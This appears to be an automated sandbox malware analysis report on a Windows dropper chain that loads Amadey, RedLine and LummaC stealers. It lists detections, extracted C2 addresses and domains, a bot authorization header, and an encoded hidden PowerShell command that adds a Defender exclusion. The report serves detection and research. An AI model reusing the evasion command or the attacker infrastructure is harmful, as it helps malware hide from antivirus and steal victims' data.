                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6892, ProcessName: svchost.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: cMTqzvmx9u.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Found malware configuration
                    Source: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpackMalware Configuration Extractor: RedLine {"C2 url": "147.45.44.224:1912", "Bot Id": "1488Traffer", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                    Source: 19.2.7ddd2a748c.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pancakedipyps.click", "tentabatte.lat", "talkynicer.lat", "slipperyloo.lat", "bashfulacid.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "curverpluch.lat"], "Build id": "FATE99--test"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exeReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Temp\1021722001\aa8c9de034.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeReversingLabs: Detection: 87%
                    Multi AV Scanner detection for submitted file
                    Source: cMTqzvmx9u.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: cMTqzvmx9u.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pancakedipyps.click
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--test
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE58D5 CryptUnprotectData,9_2_00FE58D5
                    Source: cMTqzvmx9u.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: .pdbyy: source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: ba944ca4ff.exe, 0000000F.00000000.2277534376.0000000000F2C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h9_2_01010340
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov word ptr [eax], cx9_2_00FF1A10
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]9_2_00FF3B50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFD34A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]9_2_01010D20
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]9_2_00FDCC7A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov eax, ebx9_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]9_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]9_2_01011720
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then jmp edx9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ebx9_2_00FD8600
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ecx9_2_00FEB8F6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ecx9_2_00FEB8F6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFC0E6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFE0DA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FED8D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FED8D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov esi, ecx9_2_00FF90D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FED8AC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FED8AC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov eax, ebx9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]9_2_01011160
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h9_2_0100C990
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [edi], al9_2_00FFC850
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FF2830
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then push esi9_2_00FDC805
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FF89E9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]9_2_0100C830
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FF81CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then jmp edx9_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]9_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [edi], al9_2_00FFB980
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FFD17D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h9_2_00FFB170
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov eax, dword ptr [01016130h]9_2_00FE8169
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFC09E
